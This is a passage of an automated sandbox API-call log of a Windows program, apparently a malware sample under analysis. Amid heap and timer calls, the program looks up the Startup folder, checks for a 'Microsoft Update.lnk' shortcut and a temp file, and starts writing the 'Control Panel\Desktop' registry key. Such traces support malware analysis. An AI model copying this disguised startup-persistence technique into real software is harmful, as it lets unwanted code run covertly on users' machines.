hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0256.261] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0256.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0256.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0256.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0256.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0256.262] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0256.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0256.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.263] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0256.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0256.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0256.264] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0256.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0256.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0256.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0256.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0256.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0256.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0256.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0256.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.265] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0256.265] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0256.265] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0256.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0256.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0256.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0256.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0256.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0256.266] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0256.266] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.266] timeGetTime () returned 0x117fe63 [0256.266] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.266] Sleep (dwMilliseconds=0xa) [0256.301] timeGetTime () returned 0x117fe92 [0256.301] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.301] Sleep (dwMilliseconds=0xa) [0256.348] timeGetTime () returned 0x117fec0 [0256.348] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.348] Sleep (dwMilliseconds=0xa) [0256.396] timeGetTime () returned 0x117feef [0256.396] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.396] Sleep (dwMilliseconds=0xa) [0256.551] timeGetTime () returned 0x117ff8c [0256.551] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.551] Sleep (dwMilliseconds=0xa) [0256.579] timeGetTime () returned 0x117ff9b [0256.579] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.579] Sleep (dwMilliseconds=0xa) [0256.636] timeGetTime () returned 0x117ffda [0256.636] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.636] Sleep (dwMilliseconds=0xa) [0256.664] timeGetTime () returned 0x117fff9 [0256.664] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.664] Sleep (dwMilliseconds=0xa) [0256.706] timeGetTime () returned 0x1180018 [0256.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.706] Sleep (dwMilliseconds=0xa) [0256.730] timeGetTime () returned 0x1180037 [0256.730] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.730] Sleep (dwMilliseconds=0xa) [0256.773] timeGetTime () returned 0x1180066 [0256.774] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.774] Sleep (dwMilliseconds=0xa) [0256.801] timeGetTime () returned 0x1180085 [0256.801] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.801] Sleep (dwMilliseconds=0xa) [0256.830] timeGetTime () returned 0x1180095 [0256.830] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0256.835] TranslateMessage (lpMsg=0x8cf798) returned 0 [0256.879] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0256.883] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0256.883] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0256.883] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.883] Sleep (dwMilliseconds=0xa) [0256.923] timeGetTime () returned 0x11800f3 [0256.924] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.924] Sleep (dwMilliseconds=0xa) [0256.957] timeGetTime () returned 0x1180122 [0256.957] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.957] Sleep (dwMilliseconds=0xa) [0257.004] timeGetTime () returned 0x1180151 [0257.004] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.004] Sleep (dwMilliseconds=0xa) [0257.051] timeGetTime () returned 0x1180180 [0257.052] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.052] Sleep (dwMilliseconds=0xa) [0257.097] timeGetTime () returned 0x11801ae [0257.097] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.097] Sleep (dwMilliseconds=0xa) [0257.144] timeGetTime () returned 0x11801dd [0257.144] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.144] Sleep (dwMilliseconds=0xa) [0257.192] timeGetTime () returned 0x118020c [0257.192] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.192] Sleep (dwMilliseconds=0xa) [0257.238] timeGetTime () returned 0x118023b [0257.238] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.238] Sleep (dwMilliseconds=0xa) [0257.285] timeGetTime () returned 0x118026a [0257.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0257.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0257.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0257.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0257.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0257.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0257.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0257.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0257.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0257.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0257.297] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0257.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0257.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0257.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0257.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0257.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0257.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4e8 [0257.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0257.299] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0257.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0257.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb108 [0257.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0257.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0257.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0257.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0257.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb108 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0257.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0257.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0257.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0257.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0257.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0257.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0257.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0257.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0257.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a736b8 [0257.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0257.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0257.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0257.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0257.307] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0257.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0257.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0257.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0257.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0257.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0257.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.309] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, 